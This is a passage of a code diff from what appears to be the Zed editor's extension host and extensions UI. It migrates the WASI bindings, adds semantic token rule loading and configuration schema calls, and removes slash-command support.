ExtensionLanguageServerProxy, ExtensionSnippetProxy, ExtensionThemeProxy, }; use fs::{Fs, RemoveOptions}; use futures::future::join_all; @@ -32,8 +31,8 @@ use futures::{ select_biased, }; use gpui::{ - App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, Global, Task, WeakEntity, - actions, + App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, Global, Task, UpdateGlobal as _, + WeakEntity, actions, }; use http_client::{AsyncBody, HttpClient, HttpClientWithUrl}; use language::{ @@ -46,7 +45,7 @@ use release_channel::ReleaseChannel; use remote::RemoteClient; use semver::Version; use serde::{Deserialize, Serialize}; -use settings::Settings; +use settings::{SemanticTokenRules, Settings, SettingsStore}; use std::ops::RangeInclusive; use std::str::FromStr; use std::{ @@ -55,6 +54,7 @@ use std::{ sync::Arc, time::{Duration, Instant}, }; +use task::TaskTemplates; use url::Url; use util::{ResultExt, paths::RemotePathBuf}; use wasm_host::{ @@ -1208,9 +1208,6 @@ impl ExtensionStore { for locator in extension.manifest.debug_locators.keys() { self.proxy.unregister_debug_locator(locator.clone()); } - for command_name in extension.manifest.slash_commands.keys() { - self.proxy.unregister_slash_command(command_name.clone()); - } } self.wasm_extensions @@ -1220,6 +1217,15 @@ impl ExtensionStore { self.proxy .remove_languages(&languages_to_remove, &grammars_to_remove); + // Remove semantic token rules for languages being unloaded. 
+ if !languages_to_remove.is_empty() { + SettingsStore::update_global(cx, |store, cx| { + for language in &languages_to_remove { + store.remove_language_semantic_token_rules(language.as_ref(), cx); + } + }); + } + let mut grammars_to_add = Vec::new(); let mut themes_to_add = Vec::new(); let mut icon_themes_to_add = Vec::new(); @@ -1267,23 +1273,33 @@ impl ExtensionStore { .iter() .filter(|(_, entry)| extensions_to_load.contains(&entry.extension)) .collect::>(); + let mut semantic_token_rules_to_add: Vec<(LanguageName, SemanticTokenRules)> = Vec::new(); for (language_name, language) in languages_to_add { let mut language_path = self.installed_dir.clone(); language_path.extend([ Path::new(language.extension.as_ref()), language.path.as_path(), ]); + + // Load semantic token rules if present in the language directory. + let rules_path = language_path.join(SemanticTokenRules::FILE_NAME); + if std::fs::exists(&rules_path).is_ok_and(|exists| exists) + && let Some(rules) = SemanticTokenRules::load(&rules_path).log_err() + { + semantic_token_rules_to_add.push((language_name.clone(), rules)); + } + self.proxy.register_language( language_name.clone(), language.grammar.clone(), language.matcher.clone(), language.hidden, Arc::new(move || { - let config = std::fs::read_to_string(language_path.join("config.toml"))?; - let config: LanguageConfig = ::toml::from_str(&config)?; + let config = + LanguageConfig::load(language_path.join(LanguageConfig::FILE_NAME))?; let queries = load_plugin_queries(&language_path); let context_provider = - std::fs::read_to_string(language_path.join("tasks.json")) + std::fs::read_to_string(language_path.join(TaskTemplates::FILE_NAME)) .ok() .and_then(|contents| { let definitions = @@ -1302,6 +1318,15 @@ impl ExtensionStore { ); } + // Register semantic token rules for newly loaded extension languages. 
+ if !semantic_token_rules_to_add.is_empty() { + SettingsStore::update_global(cx, |store, cx| { + for (language_name, rules) in semantic_token_rules_to_add { + store.set_language_semantic_token_rules(language_name.0.clone(), rules, cx); + } + }); + } + let fs = self.fs.clone(); let wasm_host = self.wasm_host.clone(); let root_dir = self.installed_dir.clone(); @@ -1401,21 +1426,6 @@ impl ExtensionStore { } } - for (slash_command_name, slash_command) in &manifest.slash_commands { - this.proxy.register_slash_command( - extension.clone(), - extension::SlashCommand { - name: slash_command_name.to_string(), - description: slash_command.description.to_string(), - // We don't currently expose this as a configurable option, as it currently drives - // the `menu_text` on the `SlashCommand` trait, which is not used for slash commands - // defined in extensions, as they are not able to be added to the menu. - tooltip_text: String::new(), - requires_argument: slash_command.requires_argument, - }, - ); - } - for id in manifest.context_servers.keys() { this.proxy .register_context_server(extension.clone(), id.clone(), cx); @@ -1544,7 +1554,7 @@ impl ExtensionStore { if !fs_metadata.is_dir { continue; } - let language_config_path = language_path.join("config.toml"); + let language_config_path = language_path.join(LanguageConfig::FILE_NAME); let config = fs.load(&language_config_path).await.with_context(|| { format!("loading language config from {language_config_path:?}") })?; @@ -1667,7 +1677,7 @@ impl ExtensionStore { cx.background_spawn(async move { const EXTENSION_TOML: &str = "extension.toml"; const EXTENSION_WASM: &str = "extension.wasm"; - const CONFIG_TOML: &str = "config.toml"; + const CONFIG_TOML: &str = LanguageConfig::FILE_NAME; if is_dev { let manifest_toml = toml::to_string(&loaded_extension.manifest)?; diff --git a/crates/extension_host/src/extension_store_test.rs b/crates/extension_host/src/extension_store_test.rs index 
fa93709d077d435e9d6b579ece8890885675329d..a2722da336b4d52a04a7d6da3c22347a3535bf2b 100644 --- a/crates/extension_host/src/extension_store_test.rs +++ b/crates/extension_host/src/extension_store_test.rs @@ -216,6 +216,7 @@ async fn test_extension_store(cx: &mut TestAppContext) { matcher: LanguageMatcher { path_suffixes: vec!["erb".into()], first_line_pattern: None, + ..LanguageMatcher::default() }, }, ), @@ -229,6 +230,7 @@ async fn test_extension_store(cx: &mut TestAppContext) { matcher: LanguageMatcher { path_suffixes: vec!["rb".into()], first_line_pattern: None, + ..LanguageMatcher::default() }, }, ), @@ -1005,7 +1007,7 @@ fn init_test(cx: &mut TestAppContext) { cx.set_global(store); release_channel::init(semver::Version::new(0, 0, 0), cx); extension::init(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); gpui_tokio::init(cx); }); } diff --git a/crates/extension_host/src/headless_host.rs b/crates/extension_host/src/headless_host.rs index 290dbb6fd40fc3c15dcb210c767b9102b7117544..7c30228257dbaa037fbc772be822a1000adfdfef 100644 --- a/crates/extension_host/src/headless_host.rs +++ b/crates/extension_host/src/headless_host.rs @@ -138,7 +138,9 @@ impl HeadlessExtensionStore { for language_path in &manifest.languages { let language_path = extension_dir.join(language_path); - let config = fs.load(&language_path.join("config.toml")).await?; + let config = fs + .load(&language_path.join(LanguageConfig::FILE_NAME)) + .await?; let mut config = ::toml::from_str::(&config)?; this.update(cx, |this, _cx| { @@ -279,7 +281,7 @@ impl HeadlessExtensionStore { fs.rename(&tmp_path, &path, RenameOptions::default()) .await - .context("Failed to rename {tmp_path:?} to {path:?}")?; + .with_context(|| format!("Failed to rename {tmp_path:?} to {path:?}"))?; Self::load_extension(this, extension, cx).await }) diff --git a/crates/extension_host/src/wasm_host.rs b/crates/extension_host/src/wasm_host.rs index 
fe3c11de3ae78115b8e5db08884b7e07be152324..87a2032e831fc942f6848428a901a9fe3f613fc8 100644 --- a/crates/extension_host/src/wasm_host.rs +++ b/crates/extension_host/src/wasm_host.rs @@ -42,7 +42,7 @@ use wasmtime::{ CacheStore, Engine, Store, component::{Component, ResourceTable}, }; -use wasmtime_wasi::p2::{self as wasi, IoView as _}; +use wasmtime_wasi::{WasiCtx, WasiCtxBuilder, WasiCtxView, WasiView}; use wit::Extension; pub struct WasmHost { @@ -93,7 +93,7 @@ impl extension::Extension for WasmExtension { ) -> Result { self.call(|extension, store| { async move { - let resource = store.data_mut().table().push(worktree)?; + let resource = store.data_mut().table.push(worktree)?; let command = extension .call_language_server_command( store, @@ -119,7 +119,7 @@ impl extension::Extension for WasmExtension { ) -> Result> { self.call(|extension, store| { async move { - let resource = store.data_mut().table().push(worktree)?; + let resource = store.data_mut().table.push(worktree)?; let options = extension .call_language_server_initialization_options( store, @@ -143,7 +143,7 @@ impl extension::Extension for WasmExtension { ) -> Result> { self.call(|extension, store| { async move { - let resource = store.data_mut().table().push(worktree)?; + let resource = store.data_mut().table.push(worktree)?; let options = extension .call_language_server_workspace_configuration( store, @@ -159,6 +159,48 @@ impl extension::Extension for WasmExtension { .await? } + async fn language_server_initialization_options_schema( + &self, + language_server_id: LanguageServerName, + worktree: Arc, + ) -> Result> { + self.call(|extension, store| { + async move { + let resource = store.data_mut().table.push(worktree)?; + extension + .call_language_server_initialization_options_schema( + store, + &language_server_id, + resource, + ) + .await + } + .boxed() + }) + .await? 
+ } + + async fn language_server_workspace_configuration_schema( + &self, + language_server_id: LanguageServerName, + worktree: Arc, + ) -> Result> { + self.call(|extension, store| { + async move { + let resource = store.data_mut().table.push(worktree)?; + extension + .call_language_server_workspace_configuration_schema( + store, + &language_server_id, + resource, + ) + .await + } + .boxed() + }) + .await? + } + async fn language_server_additional_initialization_options( &self, language_server_id: LanguageServerName, @@ -167,7 +209,7 @@ impl extension::Extension for WasmExtension { ) -> Result> { self.call(|extension, store| { async move { - let resource = store.data_mut().table().push(worktree)?; + let resource = store.data_mut().table.push(worktree)?; let options = extension .call_language_server_additional_initialization_options( store, @@ -192,7 +234,7 @@ impl extension::Extension for WasmExtension { ) -> Result> { self.call(|extension, store| { async move { - let resource = store.data_mut().table().push(worktree)?; + let resource = store.data_mut().table.push(worktree)?; let options = extension .call_language_server_additional_workspace_configuration( store, @@ -289,7 +331,7 @@ impl extension::Extension for WasmExtension { self.call(|extension, store| { async move { let resource = if let Some(delegate) = delegate { - Some(store.data_mut().table().push(delegate)?) + Some(store.data_mut().table.push(delegate)?) } else { None }; @@ -313,7 +355,7 @@ impl extension::Extension for WasmExtension { ) -> Result { self.call(|extension, store| { async move { - let project_resource = store.data_mut().table().push(project)?; + let project_resource = store.data_mut().table.push(project)?; let command = extension .call_context_server_command(store, context_server_id.clone(), project_resource) .await? 
@@ -332,7 +374,7 @@ impl extension::Extension for WasmExtension { ) -> Result> { self.call(|extension, store| { async move { - let project_resource = store.data_mut().table().push(project)?; + let project_resource = store.data_mut().table.push(project)?; let Some(configuration) = extension .call_context_server_configuration( store, @@ -375,7 +417,7 @@ impl extension::Extension for WasmExtension { ) -> Result<()> { self.call(|extension, store| { async move { - let kv_store_resource = store.data_mut().table().push(kv_store)?; + let kv_store_resource = store.data_mut().table.push(kv_store)?; extension .call_index_docs( store, @@ -402,7 +444,7 @@ impl extension::Extension for WasmExtension { ) -> Result { self.call(|extension, store| { async move { - let resource = store.data_mut().table().push(worktree)?; + let resource = store.data_mut().table.push(worktree)?; let dap_binary = extension .call_get_dap_binary(store, dap_name, config, user_installed_path, resource) .await? @@ -490,7 +532,7 @@ impl extension::Extension for WasmExtension { pub struct WasmState { manifest: Arc, pub table: ResourceTable, - ctx: wasi::WasiCtx, + ctx: WasiCtx, pub host: Arc, pub(crate) capability_granter: CapabilityGranter, } @@ -684,7 +726,7 @@ impl WasmHost { }) } - async fn build_wasi_ctx(&self, manifest: &Arc) -> Result { + async fn build_wasi_ctx(&self, manifest: &Arc) -> Result { let extension_work_dir = self.work_dir.join(manifest.id.as_ref()); self.fs .create_dir(&extension_work_dir) @@ -697,7 +739,7 @@ impl WasmHost { #[cfg(target_os = "windows")] let path = path.replace('\\', "/"); - let mut ctx = wasi::WasiCtxBuilder::new(); + let mut ctx = WasiCtxBuilder::new(); ctx.inherit_stdio() .env("PWD", &path) .env("RUST_BACKTRACE", "full"); @@ -905,15 +947,16 @@ impl WasmState { } } -impl wasi::IoView for WasmState { - fn table(&mut self) -> &mut ResourceTable { - &mut self.table - } +impl wasmtime::component::HasData for WasmState { + type Data<'a> = &'a mut WasmState; } -impl 
wasi::WasiView for WasmState { - fn ctx(&mut self) -> &mut wasi::WasiCtx { - &mut self.ctx +impl WasiView for WasmState { + fn ctx(&mut self) -> WasiCtxView<'_> { + WasiCtxView { + ctx: &mut self.ctx, + table: &mut self.table, + } } } diff --git a/crates/extension_host/src/wasm_host/wit.rs b/crates/extension_host/src/wasm_host/wit.rs index ddd3f604c991a43bc58f494410db1be22a93a772..27847422f01680240119877e0864491dd7660d68 100644 --- a/crates/extension_host/src/wasm_host/wit.rs +++ b/crates/extension_host/src/wasm_host/wit.rs @@ -42,18 +42,14 @@ pub use since_v0_0_4::LanguageServerConfig; pub fn new_linker( executor: &BackgroundExecutor, - f: impl Fn(&mut Linker, fn(&mut WasmState) -> &mut WasmState) -> Result<()>, + f: impl FnOnce(&mut Linker) -> Result<()>, ) -> Linker { let mut linker = Linker::new(&wasm_engine(executor)); wasmtime_wasi::p2::add_to_linker_async(&mut linker).unwrap(); - f(&mut linker, wasi_view).unwrap(); + f(&mut linker).unwrap(); linker } -fn wasi_view(state: &mut WasmState) -> &mut WasmState { - state -} - /// Returns whether the given Wasm API version is supported by the Wasm host. 
pub fn is_supported_wasm_api_version(release_channel: ReleaseChannel, version: Version) -> bool { wasm_api_version_range(release_channel).contains(&version) @@ -465,6 +461,60 @@ impl Extension { } } + pub async fn call_language_server_initialization_options_schema( + &self, + store: &mut Store, + language_server_id: &LanguageServerName, + resource: Resource>, + ) -> Result> { + match self { + Extension::V0_8_0(ext) => { + ext.call_language_server_initialization_options_schema( + store, + &language_server_id.0, + resource, + ) + .await + } + Extension::V0_6_0(_) + | Extension::V0_5_0(_) + | Extension::V0_4_0(_) + | Extension::V0_3_0(_) + | Extension::V0_2_0(_) + | Extension::V0_1_0(_) + | Extension::V0_0_6(_) + | Extension::V0_0_4(_) + | Extension::V0_0_1(_) => Ok(None), + } + } + + pub async fn call_language_server_workspace_configuration_schema( + &self, + store: &mut Store, + language_server_id: &LanguageServerName, + resource: Resource>, + ) -> Result> { + match self { + Extension::V0_8_0(ext) => { + ext.call_language_server_workspace_configuration_schema( + store, + &language_server_id.0, + resource, + ) + .await + } + Extension::V0_6_0(_) + | Extension::V0_5_0(_) + | Extension::V0_4_0(_) + | Extension::V0_3_0(_) + | Extension::V0_2_0(_) + | Extension::V0_1_0(_) + | Extension::V0_0_6(_) + | Extension::V0_0_4(_) + | Extension::V0_0_1(_) => Ok(None), + } + } + pub async fn call_language_server_additional_initialization_options( &self, store: &mut Store, diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_0_1.rs b/crates/extension_host/src/wasm_host/wit/since_v0_0_1.rs index fa7539eec9f454c95782cd0249664693074abfba..c231b7e5d69157d523973455b2437a576392a00d 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_0_1.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_0_1.rs @@ -12,8 +12,12 @@ use wasmtime::component::{Linker, Resource}; pub const MIN_VERSION: Version = Version::new(0, 0, 1); wasmtime::component::bindgen!({ - async: true, - 
trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.0.1", with: { "worktree": ExtensionWorktree, @@ -26,7 +30,11 @@ pub type ExtensionWorktree = Arc; pub fn linker(executor: &BackgroundExecutor) -> &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for latest::DownloadedFileType { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_0_4.rs b/crates/extension_host/src/wasm_host/wit/since_v0_0_4.rs index 6d7db749f0cd021bfb084eba1bc20ce72780f3d8..41d652cec3087e8e5458a048689be4494de63356 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_0_4.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_0_4.rs @@ -10,8 +10,12 @@ use wasmtime::component::{Linker, Resource}; pub const MIN_VERSION: Version = Version::new(0, 0, 4); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.0.4", with: { "worktree": ExtensionWorktree, @@ -24,7 +28,11 @@ pub type ExtensionWorktree = Arc; pub fn linker(executor: &BackgroundExecutor) -> &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for latest::DownloadedFileType { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_0_6.rs b/crates/extension_host/src/wasm_host/wit/since_v0_0_6.rs index e5ff0322088470d47e903c4a83794b654bbba531..e1dfdf8248b41de2de5e9faff3d212d06f1349c4 100644 --- 
a/crates/extension_host/src/wasm_host/wit/since_v0_0_6.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_0_6.rs @@ -10,8 +10,12 @@ use wasmtime::component::{Linker, Resource}; pub const MIN_VERSION: Version = Version::new(0, 0, 6); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.0.6", with: { "worktree": ExtensionWorktree, @@ -31,7 +35,11 @@ pub type ExtensionWorktree = Arc; pub fn linker(executor: &BackgroundExecutor) -> &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for latest::Command { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_1_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_1_0.rs index 0caaa86c2413f1b279319eeea4d8577d1ed4b5a5..4cd034d4d6af02971468ba8e57e1eebf9078353f 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_1_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_1_0.rs @@ -26,8 +26,12 @@ use super::{latest, since_v0_6_0}; pub const MIN_VERSION: Version = Version::new(0, 1, 0); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.1.0", with: { "worktree": ExtensionWorktree, @@ -52,7 +56,11 @@ pub type ExtensionHttpResponseStream = Arc &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for latest::Command { diff --git 
a/crates/extension_host/src/wasm_host/wit/since_v0_2_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_2_0.rs index 074cce73c22d547cd3198a672e6f8cdc5f750d49..691e6d2dd549b64c3783406af210b6b48f4a1dbc 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_2_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_2_0.rs @@ -11,8 +11,12 @@ use super::{latest, since_v0_6_0}; pub const MIN_VERSION: Version = Version::new(0, 2, 0); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.2.0", with: { "worktree": ExtensionWorktree, @@ -40,7 +44,11 @@ pub type ExtensionKeyValueStore = Arc; pub fn linker(executor: &BackgroundExecutor) -> &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for latest::Command { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_3_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_3_0.rs index 072ad42f2b9c2f5b3a8556b237f3907052665370..53aa65d5187663ea86fa465af76cf3aebc7844e4 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_3_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_3_0.rs @@ -11,8 +11,12 @@ use super::{latest, since_v0_6_0}; pub const MIN_VERSION: Version = Version::new(0, 3, 0); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.3.0", with: { "worktree": ExtensionWorktree, @@ -40,7 +44,11 @@ pub type ExtensionKeyValueStore = Arc; pub fn linker(executor: &BackgroundExecutor) -> &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| 
super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for latest::CodeLabel { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_4_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_4_0.rs index 4f1d5c6a48c13ff09a5c81e2b43683fa50a7ccec..44b7d7ba1ad4e3235e8772a051bb906f87c64325 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_4_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_4_0.rs @@ -11,8 +11,12 @@ use super::{latest, since_v0_6_0}; pub const MIN_VERSION: Version = Version::new(0, 4, 0); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.4.0", with: { "worktree": ExtensionWorktree, @@ -40,7 +44,11 @@ pub type ExtensionKeyValueStore = Arc; pub fn linker(executor: &BackgroundExecutor) -> &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for latest::CodeLabel { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_5_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_5_0.rs index 84f73f567750081d406b20025f0b4598cfd0f9af..4dff0d90a94fe1128c6182592093b38cf43fe573 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_5_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_5_0.rs @@ -11,8 +11,12 @@ use super::{latest, since_v0_6_0}; pub const MIN_VERSION: Version = Version::new(0, 5, 0); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.5.0", 
with: { "worktree": ExtensionWorktree, @@ -41,7 +45,11 @@ pub type ExtensionKeyValueStore = Arc; pub fn linker(executor: &BackgroundExecutor) -> &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for latest::CodeLabel { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_6_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_6_0.rs index 202bcd6ce959b27b3b7ecf8e15830cb1955ec104..bc5674b051772e464c0cbdb74e75f935959e05d8 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_6_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_6_0.rs @@ -12,8 +12,12 @@ pub const MIN_VERSION: Version = Version::new(0, 6, 0); pub const MAX_VERSION: Version = Version::new(0, 7, 0); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.6.0", with: { "worktree": ExtensionWorktree, @@ -43,7 +47,11 @@ pub type ExtensionKeyValueStore = Arc; pub fn linker(executor: &BackgroundExecutor) -> &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for latest::CodeLabel { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs index d7cf29ad0a3fcc7448d5bf44a8a2612d55e07a88..660ddd9688f7dc69f3ec3c52452122fd807257ad 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs @@ -40,8 +40,12 @@ pub const MIN_VERSION: Version = 
Version::new(0, 8, 0); pub const MAX_VERSION: Version = Version::new(0, 8, 0); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.8.0", with: { "worktree": ExtensionWorktree, @@ -65,7 +69,11 @@ pub type ExtensionHttpResponseStream = Arc &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for std::ops::Range { @@ -941,6 +949,7 @@ impl ExtensionImports for WasmState { ); Ok(serde_json::to_string(&settings::LanguageSettings { tab_size: settings.tab_size, + preferred_line_length: settings.preferred_line_length, })?) } "lsp" => { diff --git a/crates/extensions_ui/Cargo.toml b/crates/extensions_ui/Cargo.toml index a80defd128549e9f2ed6b634c188a7f2f319ef6a..6b6b6838313ecc8738df769609cf236e3f6e0bfb 100644 --- a/crates/extensions_ui/Cargo.toml +++ b/crates/extensions_ui/Cargo.toml @@ -35,7 +35,7 @@ settings.workspace = true smallvec.workspace = true strum.workspace = true telemetry.workspace = true -theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true vim_mode_setting.workspace = true diff --git a/crates/extensions_ui/src/extension_suggest.rs b/crates/extensions_ui/src/extension_suggest.rs index 7ad4c1540a419f0cdeedb2aeff7661aafac5ef4c..c78db92c2fd3b24ceb78c7a33b4ab177be483b9d 100644 --- a/crates/extensions_ui/src/extension_suggest.rs +++ b/crates/extensions_ui/src/extension_suggest.rs @@ -1,12 +1,13 @@ use std::collections::HashMap; use std::sync::{Arc, OnceLock}; -use db::kvp::KEY_VALUE_STORE; +use db::kvp::KeyValueStore; use editor::Editor; use extension_host::ExtensionStore; use gpui::{AppContext as _, Context, Entity, SharedString, Window}; use 
language::Buffer; use ui::prelude::*; +use util::ResultExt; use util::rel_path::RelPath; use workspace::notifications::simple_message_notification::MessageNotification; use workspace::{Workspace, notifications::NotificationId}; @@ -21,7 +22,7 @@ const SUGGESTIONS_BY_EXTENSION_ID: &[(&str, &[&str])] = &[ ("dart", &["dart"]), ("dockerfile", &["Dockerfile"]), ("elisp", &["el"]), - ("elixir", &["ex", "exs", "heex"]), + ("elixir", &["eex", "ex", "exs", "heex", "leex", "neex"]), ("elm", &["elm"]), ("erlang", &["erl", "hrl"]), ("fish", &["fish"]), @@ -147,7 +148,8 @@ pub(crate) fn suggest(buffer: Entity, window: &mut Window, cx: &mut Cont }; let key = language_extension_key(&extension_id); - let Ok(None) = KEY_VALUE_STORE.read_kvp(&key) else { + let kvp = KeyValueStore::global(cx); + let Ok(None) = kvp.read_kvp(&key) else { return; }; @@ -193,9 +195,11 @@ pub(crate) fn suggest(buffer: Entity, window: &mut Window, cx: &mut Cont .secondary_icon_color(Color::Error) .secondary_on_click(move |_window, cx| { let key = language_extension_key(&extension_id); - db::write_and_log(cx, move || { - KEY_VALUE_STORE.write_kvp(key, "dismissed".to_string()) - }); + let kvp = KeyValueStore::global(cx); + cx.background_spawn(async move { + kvp.write_kvp(key, "dismissed".to_string()).await.log_err() + }) + .detach(); }) }) }); diff --git a/crates/extensions_ui/src/extensions_ui.rs b/crates/extensions_ui/src/extensions_ui.rs index 1458b2104f31f4d987319c87a41bfd5538b2727f..19bf62d8bbc476049548f65616e6ca1e12f5378a 100644 --- a/crates/extensions_ui/src/extensions_ui.rs +++ b/crates/extensions_ui/src/extensions_ui.rs @@ -23,7 +23,7 @@ use project::DirectoryLister; use release_channel::ReleaseChannel; use settings::{Settings, SettingsContent}; use strum::IntoEnumIterator as _; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ Banner, Chip, ContextMenu, Divider, PopoverMenu, ScrollableHandle, Switch, ToggleButtonGroup, ToggleButtonGroupSize, ToggleButtonGroupStyle, 
ToggleButtonSimple, Tooltip, WithScrollbar, @@ -69,10 +69,6 @@ pub fn init(cx: &mut App) { ExtensionProvides::ContextServers } ExtensionCategoryFilter::AgentServers => ExtensionProvides::AgentServers, - ExtensionCategoryFilter::SlashCommands => ExtensionProvides::SlashCommands, - ExtensionCategoryFilter::IndexedDocsProviders => { - ExtensionProvides::IndexedDocsProviders - } ExtensionCategoryFilter::Snippets => ExtensionProvides::Snippets, ExtensionCategoryFilter::DebugAdapters => ExtensionProvides::DebugAdapters, }); @@ -870,9 +866,12 @@ impl ExtensionsPage { ) .child( h_flex() + .min_w_0() + .w_full() .justify_between() .child( h_flex() + .min_w_0() .gap_1() .child( Icon::new(IconName::Person) @@ -889,6 +888,7 @@ impl ExtensionsPage { .child( h_flex() .gap_1() + .flex_shrink_0() .child({ let repo_url_for_tooltip = repository_url.clone(); @@ -1052,10 +1052,11 @@ impl ExtensionsPage { "Install", ) .style(ButtonStyle::Tinted(ui::TintColor::Accent)) - .icon(IconName::Download) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(IconName::Download) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click({ let extension_id = extension.id.clone(); move |_, _, cx| { @@ -1074,10 +1075,11 @@ impl ExtensionsPage { "Install", ) .style(ButtonStyle::Tinted(ui::TintColor::Accent)) - .icon(IconName::Download) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(IconName::Download) + .size(IconSize::Small) + .color(Color::Muted), + ) .disabled(true), configure: None, upgrade: None, @@ -1475,10 +1477,11 @@ impl ExtensionsPage { } }); let open_registry_button = Button::new("open_registry", "Learn More") - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Small) - 